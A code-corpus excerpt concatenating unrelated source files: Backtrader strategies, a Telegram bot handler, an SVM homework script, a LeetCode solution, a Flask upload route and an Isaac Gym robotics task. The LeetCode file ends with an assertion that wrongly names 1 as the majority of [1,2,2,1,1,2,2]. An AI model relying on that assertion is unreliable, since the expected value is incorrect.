if trade.isclosed:\n # clear stop loss and take profit order variables for no position state\n if self.sl_order:\n self.broker.cancel(self.sl_order)\n self.sl_order = None\n\n if self.tp_order:\n self.broker.cancel(self.tp_order)\n self.tp_order = None\n\n def next(self):\n\n if self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell()\n\n # process stop loss and take profit signals\n if self.position:\n\n # set stop loss and take profit prices\n # in case of trailing stops stop loss prices can be assigned based on current indicator value\n price_sl_long = self.position.price * 0.98\n price_sl_short = self.position.price * 1.02\n price_tp_long = self.position.price * 1.06\n price_tp_short = self.position.price * 0.94\n\n # cancel existing stop loss and take profit orders\n if self.sl_order:\n self.broker.cancel(self.sl_order)\n\n if self.tp_order:\n self.broker.cancel(self.tp_order)\n\n # check & update stop loss order\n sl_price = 0.0\n if self.position.size > 0 and price_sl_long != 0: sl_price = price_sl_long\n if self.position.size < 0 and price_sl_short != 0: sl_price = price_sl_short\n\n if sl_price != 0.0:\n self.sl_order = self.order_target_value(target=0.0, exectype=bt.Order.Stop, price=sl_price)\n\n # check & update take profit order\n tp_price = 0.0\n if self.position.size > 0 and price_tp_long != 0: tp_price = price_tp_long\n if self.position.size < 0 and price_tp_short != 0: tp_price = 
price_tp_short\n\n if tp_price != 0.0:\n self.tp_order = self.order_target_value(target=0.0, exectype=bt.Order.Limit, price=tp_price)\n\nclass TTFwithBracket(TTFStrategyBase):\n\n params = dict(\n limit=0.005,\n limdays=3,\n limdays2=1000,\n limdays3=1000,\n hold=10,\n trailpercent=0.02,\n usebracket=False, # use order_target_size\n switchp1p2=False, # switch prices of order1 and order2\n )\n\n def notify_order(self, order):\n print('{}: Order ref: {} / Type {} / Status {}'.format(\n self.data.datetime.date(0),\n order.ref, 'Buy' * order.isbuy() or 'Sell' * order.issell(),\n order.getstatusname()))\n\n if order.status == order.Completed:\n self.holdstart = len(self)\n\n if not order.alive() and order.ref in self.orefs:\n self.orefs.remove(order.ref)\n\n def __init__(self):\n super(TTFwithBracket, self).__init__()\n self.orefs = list()\n self.holdstart = int()\n if self.p.usebracket:\n print('-' * 5, 'Using buy_bracket')\n\n def next(self):\n\n if self.orefs:\n return\n\n elif self.position.size == 0:\n\n if self.ttfCxLower == 1:\n close = self.data.close[0]\n p1 = close * (1.0 - self.p.limit)\n p2 = p1 - 0.02 * close\n p3 = p1 + 0.02 * close\n\n valid1 = datetime.timedelta(self.p.limdays)\n valid2 = datetime.timedelta(self.p.limdays2)\n valid3 = datetime.timedelta(self.p.limdays3)\n\n if self.p.switchp1p2:\n p1, p2 = p2, p1\n valid1, valid2 = valid2, valid1\n\n if not self.p.usebracket:\n o1 = self.buy(exectype=bt.Order.Limit,\n price=p1,\n valid=valid1,\n transmit=False)\n\n print('{}: Oref {} / Buy at {}'.format(\n self.datetime.date(), o1.ref, p1))\n\n o2 = self.sell(exectype=bt.Order.StopTrail,\n trailpercent=0.05,\n valid=valid2,\n parent=o1,\n transmit=False)\n\n print('{}: Oref {} / Sell StopTrail at {}'.format(\n self.datetime.date(), o2.ref, p2))\n\n o3 = self.sell(exectype=bt.Order.Limit,\n price=p3,\n valid=valid3,\n parent=o1,\n transmit=True)\n\n print('{}: Oref {} / Sell Limit at {}'.format(\n self.datetime.date(), o3.ref, p3))\n\n self.orefs = [o1.ref, o2.ref, o3.ref]\n\n else:\n os = self.buy_bracket(\n price=p1, valid=valid1,\n stopprice=p2, stopargs=dict(valid=valid2),\n limitprice=p3, limitargs=dict(valid=valid3), )\n\n self.orefs = [o.ref for o in os]\n\n elif self.ttfCxUpper == -1:\n\n close = self.data.close[0]\n p1 = close * (1.0 - self.p.limit)\n p2 = p1 + 0.02 * close\n p3 = p1 - 0.02 * close\n\n valid1 = datetime.timedelta(self.p.limdays)\n valid2 = datetime.timedelta(self.p.limdays2)\n valid3 = datetime.timedelta(self.p.limdays3)\n\n if self.p.switchp1p2:\n p1, p2 = p2, p1\n valid1, valid2 = valid2, valid1\n\n if not self.p.usebracket:\n o1 = self.sell(exectype=bt.Order.Limit,\n price=p1,\n valid=valid1,\n transmit=False)\n\n print('{}: Oref {} / Sell at {}'.format(\n self.datetime.date(), o1.ref, p1))\n\n o2 = self.buy(exectype=bt.Order.StopTrail,\n trailpercent=0.05,\n valid=valid2,\n parent=o1,\n transmit=False)\n\n print('{}: Oref {} / Buy StopTrail at {}'.format(\n self.datetime.date(), o2.ref, p2))\n\n o3 = self.buy(exectype=bt.Order.Limit,\n price=p3,\n valid=valid3,\n parent=o1,\n transmit=True)\n\n print('{}: Oref {} / Buy Limit at {}'.format(\n self.datetime.date(), o3.ref, p3))\n\n self.orefs = [o1.ref, o2.ref, o3.ref]\n\n else:\n os = self.sell_bracket(\n price=p1, valid=valid1,\n stopprice=p2, stopargs=dict(valid=valid2),\n limitprice=p3, limitargs=dict(valid=valid3), )\n\n self.orefs = [o.ref for o in os]\n\n else: # in the market\n if (len(self) - self.holdstart) >= self.p.hold:\n pass # do nothing in this case #TODO: Multiple data feeds#TODO: 
Multiple data feeds\n\n # elif datetime.time(2,45) < self.data.datetime.time() < datetime.time(9,0):\n # self.close(size=self.p.size)\n\nclass TTFwithBracketandCancellation(TTFStrategyBase, BracketBuying, NotifyOrderShowStatus):\n\n params = dict(usebracket=False, # use order_target_size\n switchp1p2=False, # switch prices of order1 and order2\n )\n\n def next(self):\n\n if self.position.size == 0:\n\n if self.ttfCxLower == 1:\n self.buyWithBracket()\n\n elif self.ttfCxUpper == -1:\n self.sellWithBracket()\n\n elif self.position.size < 1:\n\n if self.ttfCxLower == 1:\n self.closeSellBracket()\n\n elif self.position.size > 1:\n\n if self.ttfCxUpper == -1:\n self.closeBuyBracket()\n\n#TODO: the market order cant be executed when counteracted cross indicator triggered\n\nclass TTFHOLD(TTFStrategyBase, HoldStrategyExit):\n params = (('risk', 0.1), # risk 10%\n ('stop_dist', 200),\n (\"trailamount\", 100)) # stoploss distance 5%\n\n def __init__(self):\n super(TTFHOLD, self).__init__()\n\n def next(self):\n cash = self.broker.get_cash()\n stop_price = (self.data.close[0] - self.p.stop_dist)\n if self.position.size > 0:\n if self.ttfCxUpper == 1:\n if (len(self) - self.holdstart) >= self.p.hold:\n self.order = self.sell()\n elif self.position.size < 0:\n if self.ttfCxLower == -1:\n if (len(self) - self.holdstart) >= self.p.hold:\n self.order = self.buy()\n elif self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell_bracket(stopprice= self.p.trailamount)\n self.order = self.sell()\n self.order = self.buy(exectype=bt.Order.Stop, price=stop_price)\n elif self.ttfCxLower == 1:\n # self.buy_bracket(stopprice=self.data.close[0] - self.p.trailamount)\n self.order = self.buy()\n self.order = self.sell(exectype=bt.Order.Stop, price=stop_price)\n\n # qty = math.floor((cash * self.p.risk) / (self.data.close[0] - stop_price))\n\nclass HeikinAshiStrategy(bt.Strategy):\n def __init__(self):\n self.newdata = self.data1\n self.hkarsi = BTIndicator.talibCCI(self.data1.close)\n self.up = self.data1.close > self.data1.open\n\n def next(self):\n if self.position.size == 0:\n if self.up:\n self.buy()\n elif not self.up:\n self.sell()\n elif self.position.size > 0:\n if not self.up:\n self.sell()\n elif self.position.size < 0:\n if self.up:\n self.buy()\n\nclass PSARStrategy(IchimokuStrategy, PSARStrategyBase, KDJStrategyBase):\n pass","repo_name":"princetonwong/AlgoTrading","sub_path":"BacktraderAPI/BTStrategy.py","file_name":"BTStrategy.py","file_ext":"py","file_size_in_byte":42160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21678861280","text":"from aiogram import types\nfrom aiogram.dispatcher.filters.builtin import CommandStart\n\nfrom tgbot.keyboards.reply import menu\n#from .help import get_help\nfrom loader import dp\nfrom tgbot.keyboards.reply import menu\nfrom tgbot.services.db_api.db_commands import *\n\n\n@dp.message_handler(CommandStart())\nasync def bot_start(message: types.Message):\n await message.answer(f\"Привет, {message.from_user.full_name}!\", reply_markup=menu)\n user = await add_user(user_id=message.from_user.id, full_name=message.from_user.full_name,\n username=message.from_user.username)\n count = await count_users()\n await message.answer(\n '\\n'.join(\n [\n f'Привет, {message.from_user.full_name}!',\n f'Ты был занесен в базу',\n f'В базе {count} пользователей'\n\n ]\n )\n 
)\n","repo_name":"SayKonstantin/telegrambot-v.2","sub_path":"tgbot/handlers/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31247497871","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import PredefinedSplit\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport time\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import f1_score\n\n\n# In[2]:\n\n\ndataset = sio.loadmat('q4_dataset')\n\n\n# In[3]:\n\n\nsorted(dataset.keys())\n\n\n# In[4]:\n\n\ndata_globals = dataset['__globals__']\ndata_header = dataset['__header__']\ndata_version = dataset['__version__']\ndata_class_labels = dataset['class_labels']\ndata_images = dataset['images']\ndata_inception_features = dataset['inception_features']\n\ndata_globals = np.array(data_globals)\ndata_header = np.array(data_header)\ndata_version = np.array(data_version)\ndata_class_labels = np.array(data_class_labels)\ndata_images = np.array(data_images)\ndata_inception_features = np.array(data_inception_features)\n\n\n# In[5]:\n\n\nprint('The size of data_globals : ' +str(np.shape(data_globals)))\nprint('The size of data_header : ' +str(np.shape(data_header)))\nprint('The size of data_version : ' +str(np.shape(data_version)))\nprint('The size of data_class_labels : ' +str(np.shape(data_class_labels)))\nprint('The size of data_images : ' +str(np.shape(data_images)))\nprint('The size of data_inception_features : ' +str(np.shape(data_inception_features)))\n\n\n# In[6]:\n\n\ndef parameter_tuning_SVM(data, labels, k, C, gammas=None, kernel = 'linear'):\n \n start_time = time.time()\n \n best_params = {'best_c': None, 'best_gamma': None}\n best_score = 0\n best_c = None\n best_gamma = None\n all_scores = list()\n fold_scores = list()\n \n np.random.seed(8)\n sampleSize = np.shape(data)[0]\n featureSize = np.shape(data)[1]\n \n randomIndexes = np.random.permutation(sampleSize)\n data = data[randomIndexes]\n labels = labels[randomIndexes]\n\n fold_size = int(sampleSize / k)\n \n # Implement a 5-fold cross validation\n if (kernel == 'linear'):\n for c in C:\n \n classifier = OneVsRestClassifier(SVC(kernel='linear', C=c))\n fold_scores = list()\n \n for j in range(k):\n\n test_index_start = fold_size*j\n valid_index_start = fold_size*(j+1)\n train_index_start = fold_size*(j+2)\n\n test_indeces = np.arange(test_index_start, valid_index_start) % sampleSize\n valid_indeces = np.arange(valid_index_start, train_index_start) % sampleSize\n train_indeces = np.arange(train_index_start, sampleSize + test_index_start) % sampleSize\n\n test_data = data[test_indeces]\n test_labels = labels[test_indeces]\n\n valid_data = data[valid_indeces]\n valid_labels = labels[valid_indeces]\n\n train_data = data[train_indeces]\n train_labels = labels[train_indeces]\n\n model = classifier.fit(train_data, train_labels)\n score = classifier.score(valid_data, valid_labels)\n fold_scores.append(score)\n \n mean_fold_score = np.mean(fold_scores)\n all_scores.append(mean_fold_score)\n \n if(mean_fold_score > best_score):\n best_score = mean_fold_score\n best_c = c\n\n best_params['best_c'] = best_c\n \n \n else:\n \n for c in C:\n \n for gam in gammas:\n \n classifier = OneVsRestClassifier(SVC(kernel='rbf', C=c, gamma= gam))\n fold_scores 
= list()\n \n for j in range(k):\n\n test_index_start = fold_size*j\n valid_index_start = fold_size*(j+1)\n train_index_start = fold_size*(j+2)\n\n test_indeces = np.arange(test_index_start, valid_index_start) % sampleSize\n valid_indeces = np.arange(valid_index_start, train_index_start) % sampleSize\n train_indeces = np.arange(train_index_start, sampleSize + test_index_start) % sampleSize\n\n test_data = data[test_indeces]\n test_labels = labels[test_indeces]\n\n valid_data = data[valid_indeces]\n valid_labels = labels[valid_indeces]\n\n train_data = data[train_indeces]\n train_labels = labels[train_indeces]\n\n\n model = classifier.fit(train_data, train_labels)\n score = classifier.score(valid_data, valid_labels)\n fold_scores.append(score)\n \n mean_fold_score = np.mean(fold_scores)\n all_scores.append(mean_fold_score)\n\n if(mean_fold_score > best_score):\n best_score = mean_fold_score\n best_c = c\n best_gamma = gam\n\n best_params['best_c'] = best_c\n best_params['best_gamma'] = best_gamma\n\n end_time = time.time()\n time_elapsed = end_time - start_time\n \n return best_params, all_scores, time_elapsed\n\n\n# In[7]:\n\n\n# SVM (linear) parameter tuning\n\nC_linear = [10**-6, 10**-4, 10**-2, 1, 10**1, 10**10]\n\nbest_params_linear, scores_linear, time_linear = parameter_tuning_SVM(data_inception_features, data_class_labels, 5, \n C_linear, gammas = None, kernel = 'linear')\n\n\n# In[8]:\n\n\nprint('Best parameters for SVM (linear) : ' +str(best_params_linear))\nprint('\\n')\nprint('The scores for SVM (linear) : ' +str(scores_linear))\nprint('\\n')\nprint('Time elapsed on training SVM (linear) : ' +str(time_linear) +' seconds')\n\n\n# In[9]:\n\n\nfigureNum = 0\nx = ['10^-6', '10^-4', '10^-2', '1', '10^1', '10^10']\nplt.figure(figureNum)\nplt.bar(x, scores_linear)\nplt.title('Mean accuracies for each C')\nplt.xlabel('C')\nplt.ylabel('Accuracy')\nplt.show()\n\n\n# In[10]:\n\n\n# To train the SVM once more with the best parameters\n\ndef train_SVM(data, labels, k, best_c, best_gamma = None, kernel = 'linear'):\n f1_macro_folds = list()\n classification_scores = list()\n \n if(kernel == 'linear'):\n classifier = OneVsRestClassifier(SVC(kernel='linear', C=best_c))\n else:\n classifier = OneVsRestClassifier(SVC(kernel='rbf', C=best_c, gamma= best_gamma))\n\n np.random.seed(8)\n sampleSize = np.shape(data)[0]\n featureSize = np.shape(data)[1]\n \n randomIndexes = np.random.permutation(sampleSize)\n data = data[randomIndexes]\n labels = labels[randomIndexes]\n \n fold_size = int(sampleSize / k)\n \n for j in range(k):\n \n test_index_start = fold_size*j\n train_index_start = fold_size*(j+1)\n\n test_indeces = np.arange(test_index_start, train_index_start) % sampleSize\n train_indeces = np.arange(train_index_start, sampleSize + test_index_start) % sampleSize\n \n test_data = data[test_indeces]\n test_labels = labels[test_indeces]\n \n train_data = data[train_indeces]\n train_labels = labels[train_indeces]\n \n model = classifier.fit(train_data, train_labels)\n y_pred = classifier.predict(test_data)\n scores = classification_report(test_labels, y_pred)\n \n f1_macro_folds.append(f1_score(test_labels, y_pred, average='macro'))\n classification_scores.append(scores)\n \n return classification_scores, f1_macro_folds\n\n\n# In[11]:\n\n\n# Again train the SMV linear with best parameter with 5 fold cross validation\n\nbest_c_linear = best_params_linear['best_c']\n\nclassification_scores_linear, f1_macro_linear = train_SVM(data_inception_features, data_class_labels, 5,\n best_c_linear, best_gamma = 
None, kernel = 'linear')\n\n\n# In[12]:\n\n\nprint('SVM(linear) with best parameters:')\nprint('\\n')\n\nfor i in range(5):\n print('Fold ' +str(i+1)+':')\n print(classification_scores_linear[i])\n print('\\n')\n\n\n# In[13]:\n\n\n# Question 4.2\n\n# SVM (rbf) parameter tuning\n\nC_rbf = [10**-6, 10**-4, 10**-2, 1, 10**1, 10**10]\n\nvar_data = np.var(data_inception_features)\nfeaturesize = np.shape(data_inception_features)[1]\nscale = 1 / (featuresize * var_data)\n\ngamma_rbf = [2**-4, 2**-2, 1, 2**2, 2**10, scale]\n\nbest_params_rbf, scores_rbf, time_rbf = parameter_tuning_SVM(data_inception_features, data_class_labels, 5,\n C_rbf, gammas = gamma_rbf, kernel = 'rbf')\n\n\n# In[14]:\n\n\nprint('Best parameters for SVM (rbf) : ' +str(best_params_rbf))\nprint('\\n')\n#print('The scores for SVM (rbf) : ' +str(scores_rbf))\nprint('Time elapsed on training SVM (rbf) : ' +str(time_rbf) + ' seconds')\n\n\n# In[15]:\n\n\n# Again train the SMV (rbf) with best parameter with 5 fold cross validation\n\nbest_c_rbf = best_params_rbf['best_c']\nbest_gamma_rbf = best_params_rbf['best_gamma']\n\n\n# In[16]:\n\n\nclassification_scores_rbf, f1_macro_rbf = train_SVM(data_inception_features, data_class_labels, 5,\n best_c_rbf, best_gamma = best_gamma_rbf, kernel = 'rbf')\n\n\n# In[17]:\n\n\nprint('SVM(rbf) with best parameters:')\nprint('\\n')\nfor i in range(5):\n print('Fold ' +str(i+1)+':')\n print(classification_scores_rbf[i])\n print('\\n')\n\n\n# In[19]:\n\n\nx = ['Linear', 'RBF']\nF1_macro_all = list()\nF1_macro_all.append(f1_macro_linear)\nF1_macro_all.append(f1_macro_rbf)\n\nfigureNum += 1\nplt.figure(figureNum)\nplt.boxplot(F1_macro_all)\nplt.title('F1 Macro Comparison between SVM Linear and SVM Rbf ')\nplt.xticks(np.arange(1,3), (r'Linear', r'RBF'))\nplt.xlabel('F1')\nplt.show()\n\n","repo_name":"ozdamarberkan/Machine_Learning","sub_path":"Homework2/Question4.py","file_name":"Question4.py","file_ext":"py","file_size_in_byte":9795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43227359231","text":"from collections import defaultdict\n\nclass Solution(object):\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n major = len(nums) >> 1\n count = defaultdict(int)\n for elem in nums:\n count[elem] += 1\n if count[elem] > major:\n return elem\n\n\n# assert Solution().majorityElement([1, 2, 2, 1, 1, 2]) == 1 # but mine is null\nassert Solution().majorityElement([1, 2, 2, 1, 1, 2, 2]) == 1\n","repo_name":"wufangjie/leetcode","sub_path":"169. Majority Element.py","file_name":"169. Majority Element.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"5587496412","text":"import os\nimport uuid\nfrom app.libs.tools import secure_filename\nfrom flask import request, current_app, jsonify\nfrom app.libs.redprint import Redprint\n\napi = Redprint('upload')\n\n\n@api.route('', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n file = request.files['file']\n if file and _allowed_file(file.filename):\n filename = secure_filename(file.filename)\n # 因为上次的文件可能有重名,因此使用uuid保存文件\n file_name = str(uuid.uuid4()) + '.' + filename.rsplit('.', 1)[1]\n file.save(os.path.join(current_app.config['UPLOAD_FOLDER'], file_name))\n return jsonify({\"msg\": \"success\", \"file_name\": file_name})\n return jsonify({\"msg\": \"failed\"})\n return '''\n \n \n \n \n Upload new File\n
<h1>Upload new File</h1>\n    <form method=post enctype=multipart/form-data>\n      <input type=file name=file>\n      <input type=submit value=Upload>\n    </form>
\n '''\n\n\ndef _allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1] in current_app.config['ALLOW_EXTENSIONS']\n","repo_name":"chenyang929/flask-api-basic","sub_path":"app/api/v1/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28124033963","text":"\"\"\"Factory: Class for peg-hole place task.\n\nInherits peg-hole environment class and abstract task class (not enforced). Can be executed with\npython train.py task=FactoryTaskPegHolePlace\n\"\"\"\n\nimport hydra\nimport omegaconf\nimport os\nimport torch\n\nfrom isaacgym import gymapi, gymtorch, torch_utils\nimport isaacgymenvs.tasks.factory.factory_control as fc\nfrom isaacgymenvs.tasks.factory.factory_env_peg_hole import FactoryEnvPegHole\nfrom isaacgymenvs.tasks.factory.factory_schema_class_task import FactoryABCTask\nfrom isaacgymenvs.tasks.factory.factory_schema_config_task import FactorySchemaConfigTask\nfrom isaacgymenvs.utils import torch_jit_utils\nimport math\n\nclass FactoryTaskPegHolePlace(FactoryEnvPegHole, FactoryABCTask):\n\n def __init__(self, cfg, rl_device, sim_device, graphics_device_id, headless, virtual_screen_capture, force_render):\n \"\"\"Initialize instance variables. Initialize environment superclass.\"\"\"\n\n super().__init__(cfg, rl_device, sim_device, graphics_device_id, headless, virtual_screen_capture, force_render)\n\n self.cfg = cfg\n self._get_task_yaml_params()\n self._acquire_task_tensors()\n self.parse_controller_spec()\n\n if self.cfg_task.sim.disable_gravity:\n self.disable_gravity()\n\n if self.viewer is not None:\n self._set_viewer_params()\n\n def _get_task_yaml_params(self):\n \"\"\"Initialize instance variables from YAML files.\"\"\"\n\n cs = hydra.core.config_store.ConfigStore.instance()\n cs.store(name='factory_schema_config_task', node=FactorySchemaConfigTask)\n\n self.cfg_task = omegaconf.OmegaConf.create(self.cfg)\n self.max_episode_length = self.cfg_task.rl.max_episode_length # required instance var for VecTask\n\n asset_info_path = '../../assets/factory/yaml/factory_asset_info_insertion.yaml' # relative to Gym's Hydra search path (cfg dir)\n self.asset_info_peg_hole = hydra.compose(config_name=asset_info_path)\n self.asset_info_peg_hole = self.asset_info_peg_hole['']['']['']['']['']['']['assets']['factory']['yaml'] # strip superfluous nesting\n\n ppo_path = 'train/FactoryTaskPegHolePlacePPO.yaml' # relative to Gym's Hydra search path (cfg dir)\n self.cfg_ppo = hydra.compose(config_name=ppo_path)\n self.cfg_ppo = self.cfg_ppo['train'] # strip superfluous nesting\n\n def _acquire_task_tensors(self):\n \"\"\"Acquire tensors.\"\"\"\n \n \n self.peg_base_pos_local= (self.hole_heights + self.cfg_task.rl.peg_over_hole) * \\\n torch.tensor([0.0, 0.0, 1.0], device=self.device).repeat((self.num_envs, 1))\n self.hole_pos_local= self.hole_heights * torch.tensor([0.0, 0.0, 1.0], device=self.device).repeat((self.num_envs, 1))\n\n # Keypoint tensors\n self.keypoint_offsets = self._get_keypoint_offsets(self.cfg_task.rl.num_keypoints) * self.cfg_task.rl.keypoint_scale\n\n self.keypoints_peg = torch.zeros((self.num_envs, self.cfg_task.rl.num_keypoints, 3),\n dtype=torch.float32,\n device=self.device)\n self.keypoints_hole = torch.zeros_like(self.keypoints_peg, device=self.device)\n\n self.identity_quat = torch.tensor([0.0, 0.0, 0.0, 1.0], device=self.device).unsqueeze(0).repeat(self.num_envs, 1)\n\n self.actions = torch.zeros((self.num_envs, 
self.cfg_task.env.numActions), device=self.device)\n\n def _refresh_task_tensors(self):\n \"\"\"Refresh tensors.\"\"\"\n\n # # Compute pos of keypoints on gripper and peg in world frame\n for idx, keypoint_offset in enumerate(self.keypoint_offsets):\n self.keypoints_peg[:, idx] = torch_jit_utils.tf_combine(self.peg_quat,\n self.peg_pos,\n self.identity_quat,\n (keypoint_offset + self.peg_base_pos_local))[1]\n self.keypoints_hole[:, idx] = torch_jit_utils.tf_combine(self.hole_quat,\n self.hole_pos,\n self.identity_quat,\n (keypoint_offset + self.hole_pos_local))[1]\n \n def pre_physics_step(self, actions):\n \"\"\"Reset environments. Apply actions from policy. Simulation step called after this method.\"\"\"\n\n env_ids = self.reset_buf.nonzero(as_tuple=False).squeeze(-1)\n if len(env_ids) > 0:\n self.reset_idx(env_ids)\n\n self.actions = actions.clone().to(self.device) # shape = (num_envs, num_actions); values = [-1, 1]\n\n self._apply_actions_as_ctrl_targets(actions=self.actions,\n ctrl_target_gripper_dof_pos=0.0,\n do_scale=True)\n\n def post_physics_step(self):\n \"\"\"Step buffers. Refresh tensors. Compute observations and reward. Reset environments.\"\"\"\n\n self.progress_buf[:] += 1\n\n self.refresh_base_tensors()\n self.refresh_env_tensors()\n self._refresh_task_tensors()\n self.compute_observations()\n self.compute_reward()\n\n def compute_observations(self):\n \"\"\"Compute observations.\"\"\"\n\n # Shallow copies of tensors\n obs_tensors = [self.fingertip_midpoint_pos,\n self.fingertip_midpoint_quat,\n self.fingertip_midpoint_linvel,\n self.fingertip_midpoint_angvel,\n self.peg_pos,\n self.peg_quat,\n self.hole_pos,\n self.hole_quat,]\n\n self.obs_buf = torch.cat(obs_tensors, dim=-1) # shape = (num_envs, num_observations)\n\n return self.obs_buf\n\n def compute_reward(self):\n \"\"\"Update reward and reset buffers.\"\"\"\n\n self._update_reset_buf()\n self._update_rew_buf()\n\n def _update_reset_buf(self):\n \"\"\"Assign environments for reset if successful or failed.\"\"\"\n\n # If max episode length has been reached\n self.reset_buf[:] = torch.where(self.progress_buf[:] >= self.max_episode_length - 1,\n torch.ones_like(self.reset_buf),\n self.reset_buf)\n\n def _update_rew_buf(self):\n \"\"\"Compute reward at current timestep.\"\"\"\n\n keypoint_reward = -self._get_keypoint_dist()\n action_penalty = torch.norm(self.actions, p=2, dim=-1) * self.cfg_task.rl.action_penalty_scale\n\n self.rew_buf[:] = keypoint_reward * self.cfg_task.rl.keypoint_reward_scale \\\n - action_penalty * self.cfg_task.rl.action_penalty_scale\n\n # In this policy, episode length is constant across all envs\n is_last_step = (self.progress_buf[0] == self.max_episode_length - 1)\n \n if is_last_step:\n # Check if peg is close enough to hole\n is_peg_close_to_hole = self._check_peg_close_to_hole()\n self.rew_buf[:] += is_peg_close_to_hole * self.cfg_task.rl.success_bonus\n self.extras['successes'] = torch.mean(is_peg_close_to_hole.float())\n\n def reset_idx(self, env_ids):\n \"\"\"Reset specified environments.\"\"\"\n\n self._reset_franka(env_ids)\n self._reset_object(env_ids)\n\n # Close gripper onto peg\n self.disable_gravity() # to prevent peg from falling\n for _ in range(self.cfg_task.env.num_gripper_close_sim_steps):\n self.ctrl_target_dof_pos[env_ids, 7:9] = 0.0\n delta_hand_pose = torch.zeros((self.num_envs, self.cfg_task.env.numActions),\n device=self.device) # no arm motion\n self._apply_actions_as_ctrl_targets(actions=delta_hand_pose,\n ctrl_target_gripper_dof_pos=0.0,\n do_scale=False)\n 
self.gym.simulate(self.sim)\n self.render()\n self.enable_gravity(gravity_mag=abs(self.cfg_base.sim.gravity[2]))\n\n self._randomize_gripper_pose(env_ids, sim_steps=self.cfg_task.env.num_gripper_move_sim_steps)\n\n self._reset_buffers(env_ids)\n\n def _reset_franka(self, env_ids):\n \"\"\"Reset DOF states and DOF targets of Franka.\"\"\"\n\n self.dof_pos[env_ids] = torch.cat((torch.tensor(self.cfg_task.randomize.franka_arm_initial_dof_pos, \n device=self.device).repeat((len(env_ids), 1)),\n (self.peg_widths * 0.5) * 1.1, # buffer on gripper DOF pos to prevent initial contact\n (self.peg_widths * 0.5) * 1.1), # buffer on gripper DOF pos to prevent initial contact\n dim=-1) # shape = (num_envs, num_dofs)\n\n self.dof_vel[env_ids] = 0.0 # shape = (num_envs, num_dofs)\n self.ctrl_target_dof_pos[env_ids] = self.dof_pos[env_ids]\n\n multi_env_ids_int32 = self.franka_actor_ids_sim[env_ids].flatten()\n self.gym.set_dof_state_tensor_indexed(self.sim,\n gymtorch.unwrap_tensor(self.dof_state),\n gymtorch.unwrap_tensor(multi_env_ids_int32),\n len(multi_env_ids_int32))\n\n def _reset_object(self, env_ids):\n \"\"\"Reset root states of peg and hole.\"\"\"\n\n # shape of root_pos = (num_envs, num_actors, 3)\n # shape of root_quat = (num_envs, num_actors, 4)\n # shape of root_linvel = (num_envs, num_actors, 3)\n # shape of root_angvel = (num_envs, num_actors, 3)\n\n # Randomize root state of peg within gripper\n self.root_pos[env_ids, self.peg_actor_id_env, 0] = 0.0\n self.root_pos[env_ids, self.peg_actor_id_env, 1] = 0.0\n fingertip_midpoint_pos_reset = 0.58781 # self.fingertip_midpoint_pos at reset\n peg_base_pos_local = self.cfg_task.rl.peg_finger_com_offset + self.peg_heights.squeeze(-1)*0.5\n self.root_pos[env_ids, self.peg_actor_id_env, 2] = fingertip_midpoint_pos_reset - peg_base_pos_local\n\n peg_noise_pos_in_gripper = 2 * (torch.rand((self.num_envs, 3), dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n peg_noise_pos_in_gripper = peg_noise_pos_in_gripper @ torch.diag(\n torch.tensor(self.cfg_task.randomize.peg_noise_pos_in_gripper, device=self.device))\n self.root_pos[env_ids, self.peg_actor_id_env, :] += peg_noise_pos_in_gripper[env_ids]\n\n \n peg_rot_euler = torch.tensor([0.0, 0.0, math.pi * 0.5], device=self.device).repeat(len(env_ids), 1)\n peg_noise_rot_in_gripper = 2 * (torch.rand(self.num_envs, dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n peg_noise_rot_in_gripper *= self.cfg_task.randomize.peg_noise_rot_in_gripper\n peg_rot_euler[:, 2] += peg_noise_rot_in_gripper\n peg_rot_quat = torch_utils.quat_from_euler_xyz(peg_rot_euler[:, 0], peg_rot_euler[:, 1], peg_rot_euler[:, 2])\n self.root_quat[env_ids, self.peg_actor_id_env] = peg_rot_quat\n\n # Randomize root state of hole\n hole_noise_xy = 2 * (torch.rand((self.num_envs, 2), dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n hole_noise_xy = hole_noise_xy @ torch.diag(\n torch.tensor(self.cfg_task.randomize.hole_pos_xy_noise, dtype=torch.float32, device=self.device))\n self.root_pos[env_ids, self.hole_actor_id_env, 0] = self.cfg_task.randomize.hole_pos_xy_initial[0] + \\\n hole_noise_xy[env_ids, 0]\n self.root_pos[env_ids, self.hole_actor_id_env, 1] = self.cfg_task.randomize.hole_pos_xy_initial[1] + \\\n hole_noise_xy[env_ids, 1]\n self.root_pos[env_ids, self.hole_actor_id_env, 2] = self.cfg_base.env.table_height\n self.root_quat[env_ids, self.hole_actor_id_env] = torch.tensor([0.0, 0.0, 0.0, 1.0], dtype=torch.float32,\n device=self.device).repeat(len(env_ids), 1)\n\n self.root_linvel[env_ids, 
